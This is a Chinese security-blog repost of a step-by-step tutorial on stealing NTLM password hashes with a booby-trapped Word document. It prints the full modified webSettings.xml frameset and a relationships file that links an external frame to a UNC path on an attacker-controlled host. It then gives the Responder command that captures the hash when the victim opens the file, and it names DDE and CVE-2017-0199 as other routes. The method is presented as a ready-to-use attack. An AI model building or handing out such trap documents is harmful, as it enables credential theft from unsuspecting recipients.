会员服务

通过Microsoft Office 窃取 NTLM Hashes

2018 年 4 月 25 日 黑白之道

之前有人总结了很多种窃取NTLM hash的方法,原文,译文。里面写的方法已经很多了,最近又学到了一个新的方法,所以在这里进行一下分享,也算是一个补充。


历史上,Microsoft Word被用作HTML编辑器。这意味着它可以支持HTML元素,例如框架集。因此,可以将Microsoft Word文档与UNC路径链接起来,并将其与响应程序结合,以便从外部捕获NTLM哈希值。带有docx扩展名的Word文档实际上是一个包含各种XML文档的zip文件。这些XML文件正在控制主题,字体,文档的设置和Web设置。


所以我们可以新建一个任意文档,并用压缩包来打开他。

在word 目录下有一个webSettings.xml。我们对这个文件进行修改,添加以下代码则会创建与另外一个文件的链接。


<w:frameset>

<w:framesetSplitbar>

<w:w w:val="60"/>

<w:color w:val="auto"/>

<w:noBorder/>

</w:framesetSplitbar>

<w:frameset>

<w:frame>

<w:name w:val="3"/>

<w:sourceFileName r:id="rId1"/>

<w:linkedToFile/>

</w:frame>

</w:frameset>

</w:frameset>

最终修改后的webSettings.xml如下:


<?xml version="1.0" encoding="UTF-8" standalone="yes"?>

<w:webSettings xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" mc:Ignorable="w14">

    <w:frameset>

<w:framesetSplitbar>

<w:w w:val="60"/>

<w:color w:val="auto"/>

<w:noBorder/>

</w:framesetSplitbar>

<w:frameset>

<w:frame>

<w:name w:val="3"/>

<w:sourceFileName r:id="rId1"/>

<w:linkedToFile/>

</w:frame>

</w:frameset>

</w:frameset>

<w:optimizeForBrowser/><w:allowPNG/></w:webSettings>

现在我们把新的webSettings.xml替换原来的webSettings.xml,之后在word目录下的_rels目录创建一个新的文件 webSettings.xml.rels,文件内容如下:


<?xml version="1.0" encoding="UTF-8" standalone="yes"?>

<Relationships

xmlns="http://schemas.openxmlformats.org/package/2006/relationships">

<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/frame" Target="\\172.16.103.130\Updates.docx" TargetMode="External"/>

</Relationships>


在这里包含了UNC路径。指向我们的Responder。


之后把文档重新命名为docx。开启Responder


python Responder.py -I eth0 -wrf

打开word,则可获取到hash当然,



使用DDE的方式以及CVE-2017-0199等其他的方式都是可以的。


文章出处:Evi1cg's blog   

原文链接: https://evi1cg.me/archives/Get_NTLM_Hashes.html

你可能喜欢

最新变种利用OFFICE漏洞绕过多家杀软

微软Office曝存在17年之久的“全版本影响”老洞

Office最新0day漏洞 所有Word版本受影响

登录查看更多
0

相关内容

Microsoft Office 是一套由微软开发的办公软件。
【SIGIR2020】学习搜索查询的颜色表示,Learning Colour Representations of Search Queries
【SIGIR2020】学习搜索查询的颜色表示,Learning Colour Representations of Search Queries
专知会员服务
16+阅读 · 2020年6月18日
【Manning新书】现代Java实战,592页pdf
【Manning新书】现代Java实战,592页pdf
专知会员服务
98+阅读 · 2020年5月22日
【实用书】Python技术手册,第三版767页pdf
【实用书】Python技术手册,第三版767页pdf
专知会员服务
229+阅读 · 2020年5月21日
【实用书】Python爬虫Web抓取数据,第二版,306页pdf
【实用书】Python爬虫Web抓取数据,第二版,306页pdf
专知会员服务
115+阅读 · 2020年5月10日
【实用书】挖掘社交媒体,208页pdf使用Python分析网络数据
【实用书】挖掘社交媒体,208页pdf使用Python分析网络数据
专知会员服务
58+阅读 · 2020年5月8日
【伯克利】黑盒机器翻译系统的模仿攻击与防御,Imitation Attacks and Defenses for Black-box Machine Translation Systems
【伯克利】黑盒机器翻译系统的模仿攻击与防御,Imitation Attacks and Defenses for Black-box Machine Translation Systems
专知会员服务
6+阅读 · 2020年5月4日
【实用书】流数据处理,Streaming Data,219页pdf
【实用书】流数据处理,Streaming Data,219页pdf
专知会员服务
76+阅读 · 2020年4月24日
【资源】100+本免费数据科学书
【资源】100+本免费数据科学书
专知会员服务
105+阅读 · 2020年3月17日
【SIGMOD2020-CMU】在内存中搜索树的顺序保持键压缩,Order-Preserving Key Compression for In-Memory Search Trees
【SIGMOD2020-CMU】在内存中搜索树的顺序保持键压缩,Order-Preserving Key Compression for In-Memory Search Trees
专知会员服务
14+阅读 · 2020年3月7日
计算机视觉最佳实践、代码示例和相关文档
计算机视觉最佳实践、代码示例和相关文档
专知会员服务
17+阅读 · 2019年10月9日
Python 3.8.0来了!
Python 3.8.0来了!
数据派THU
5+阅读 · 2019年10月22日
后渗透利用msf关闭防火墙
后渗透利用msf关闭防火墙
黑白之道
8+阅读 · 2019年8月24日
ISeeYou一款强大的社工工具
ISeeYou一款强大的社工工具
黑白之道
29+阅读 · 2019年5月17日
Kali Linux 渗透测试:密码攻击
Kali Linux 渗透测试:密码攻击
计算机与网络安全
15+阅读 · 2019年5月13日
Pupy – 全平台远程控制工具
Pupy – 全平台远程控制工具
黑白之道
43+阅读 · 2019年4月26日
已删除
已删除
架构文摘
3+阅读 · 2019年4月17日
34 款 Windows 软件中的神器:看片、安全杀毒、效率神器,它们最好用
34 款 Windows 软件中的神器:看片、安全杀毒、效率神器,它们最好用
少数派
7+阅读 · 2019年3月4日
Seq2seq强化,Pointer Network简介
Seq2seq强化,Pointer Network简介
机器学习算法与Python学习
15+阅读 · 2018年12月8日
比Selenium快100倍的方法爬东方财富网财务报表
比Selenium快100倍的方法爬东方财富网财务报表
程序人生
8+阅读 · 2018年10月31日
TensorFlow全新的数据读取方式:Dataset API入门教程
TensorFlow全新的数据读取方式:Dataset API入门教程
量子位
8+阅读 · 2017年11月10日
A survey on deep hashing for image retrieval
A survey on deep hashing for image retrieval
Arxiv
14+阅读 · 2020年6月10日
STAR-GCN: Stacked and Reconstructed Graph Convolutional Networks for Recommender Systems
Arxiv
9+阅读 · 2019年5月27日
Knowledge-Embedded Routing Network for Scene Graph Generation
Arxiv
5+阅读 · 2019年3月8日
A Fully Convolutional Two-Stream Fusion Network for Interactive Image Segmentation
A Fully Convolutional Two-Stream Fusion Network for Interactive Image Segmentation
Arxiv
5+阅读 · 2018年7月6日
Scaling Neural Machine Translation
Arxiv
3+阅读 · 2018年6月1日
Fine-Grained Attention Mechanism for Neural Machine Translation
Arxiv
4+阅读 · 2018年4月3日
Hashing as Tie-Aware Learning to Rank
Arxiv
5+阅读 · 2018年3月28日
The Web as a Knowledge-base for Answering Complex Questions
Arxiv
5+阅读 · 2018年3月18日
Zero-Shot Sketch-Image Hashing
Arxiv
5+阅读 · 2018年3月6日
Deep Learning Framework for Multi-class Breast Cancer Histology Image Classification
Arxiv
9+阅读 · 2018年2月3日
VIP会员
相关主题
Microsoft Office
XPath
Microsoft Word
HTML编辑器
哈希学习
微软
相关VIP内容
【SIGIR2020】学习搜索查询的颜色表示,Learning Colour Representations of Search Queries
【SIGIR2020】学习搜索查询的颜色表示,Learning Colour Representations of Search Queries
专知会员服务
16+阅读 · 2020年6月18日
【Manning新书】现代Java实战,592页pdf
【Manning新书】现代Java实战,592页pdf
专知会员服务
98+阅读 · 2020年5月22日
【实用书】Python技术手册,第三版767页pdf
【实用书】Python技术手册,第三版767页pdf
专知会员服务
229+阅读 · 2020年5月21日
【实用书】Python爬虫Web抓取数据,第二版,306页pdf
【实用书】Python爬虫Web抓取数据,第二版,306页pdf
专知会员服务
115+阅读 · 2020年5月10日
【实用书】挖掘社交媒体,208页pdf使用Python分析网络数据
【实用书】挖掘社交媒体,208页pdf使用Python分析网络数据
专知会员服务
58+阅读 · 2020年5月8日
【伯克利】黑盒机器翻译系统的模仿攻击与防御,Imitation Attacks and Defenses for Black-box Machine Translation Systems
【伯克利】黑盒机器翻译系统的模仿攻击与防御,Imitation Attacks and Defenses for Black-box Machine Translation Systems
专知会员服务
6+阅读 · 2020年5月4日
【实用书】流数据处理,Streaming Data,219页pdf
【实用书】流数据处理,Streaming Data,219页pdf
专知会员服务
76+阅读 · 2020年4月24日
【资源】100+本免费数据科学书
【资源】100+本免费数据科学书
专知会员服务
105+阅读 · 2020年3月17日
【SIGMOD2020-CMU】在内存中搜索树的顺序保持键压缩,Order-Preserving Key Compression for In-Memory Search Trees
【SIGMOD2020-CMU】在内存中搜索树的顺序保持键压缩,Order-Preserving Key Compression for In-Memory Search Trees
专知会员服务
14+阅读 · 2020年3月7日
计算机视觉最佳实践、代码示例和相关文档
计算机视觉最佳实践、代码示例和相关文档
专知会员服务
17+阅读 · 2019年10月9日
热门VIP内容
相关资讯
Python 3.8.0来了!
Python 3.8.0来了!
数据派THU
5+阅读 · 2019年10月22日
后渗透利用msf关闭防火墙
后渗透利用msf关闭防火墙
黑白之道
8+阅读 · 2019年8月24日
ISeeYou一款强大的社工工具
ISeeYou一款强大的社工工具
黑白之道
29+阅读 · 2019年5月17日
Kali Linux 渗透测试:密码攻击
Kali Linux 渗透测试:密码攻击
计算机与网络安全
15+阅读 · 2019年5月13日
Pupy – 全平台远程控制工具
Pupy – 全平台远程控制工具
黑白之道
43+阅读 · 2019年4月26日
已删除
已删除
架构文摘
3+阅读 · 2019年4月17日
34 款 Windows 软件中的神器:看片、安全杀毒、效率神器,它们最好用
34 款 Windows 软件中的神器:看片、安全杀毒、效率神器,它们最好用
少数派
7+阅读 · 2019年3月4日
Seq2seq强化,Pointer Network简介
Seq2seq强化,Pointer Network简介
机器学习算法与Python学习
15+阅读 · 2018年12月8日
比Selenium快100倍的方法爬东方财富网财务报表
比Selenium快100倍的方法爬东方财富网财务报表
程序人生
8+阅读 · 2018年10月31日
TensorFlow全新的数据读取方式:Dataset API入门教程
TensorFlow全新的数据读取方式:Dataset API入门教程
量子位
8+阅读 · 2017年11月10日
相关论文
A survey on deep hashing for image retrieval
A survey on deep hashing for image retrieval
Arxiv
14+阅读 · 2020年6月10日
STAR-GCN: Stacked and Reconstructed Graph Convolutional Networks for Recommender Systems
Arxiv
9+阅读 · 2019年5月27日
Knowledge-Embedded Routing Network for Scene Graph Generation
Arxiv
5+阅读 · 2019年3月8日
A Fully Convolutional Two-Stream Fusion Network for Interactive Image Segmentation
A Fully Convolutional Two-Stream Fusion Network for Interactive Image Segmentation
Arxiv
5+阅读 · 2018年7月6日
Scaling Neural Machine Translation
Arxiv
3+阅读 · 2018年6月1日
Fine-Grained Attention Mechanism for Neural Machine Translation
Arxiv
4+阅读 · 2018年4月3日
Hashing as Tie-Aware Learning to Rank
Arxiv
5+阅读 · 2018年3月28日
The Web as a Knowledge-base for Answering Complex Questions
Arxiv
5+阅读 · 2018年3月18日
Zero-Shot Sketch-Image Hashing
Arxiv
5+阅读 · 2018年3月6日
Deep Learning Framework for Multi-class Breast Cancer Histology Image Classification
Arxiv
9+阅读 · 2018年2月3日
大家都在搜
  1. TDGN
  2. 智能仓储
  3. 大型语言模型
  4. 扩散模型
  5. 模型综述
  6. 成飞
  7. 李清照词作
  8. 卡尔曼
  9. AGV
  10. 最受欢迎动物书系列之“红皮书”
    11.
Top
微信扫码咨询专知VIP会员
Top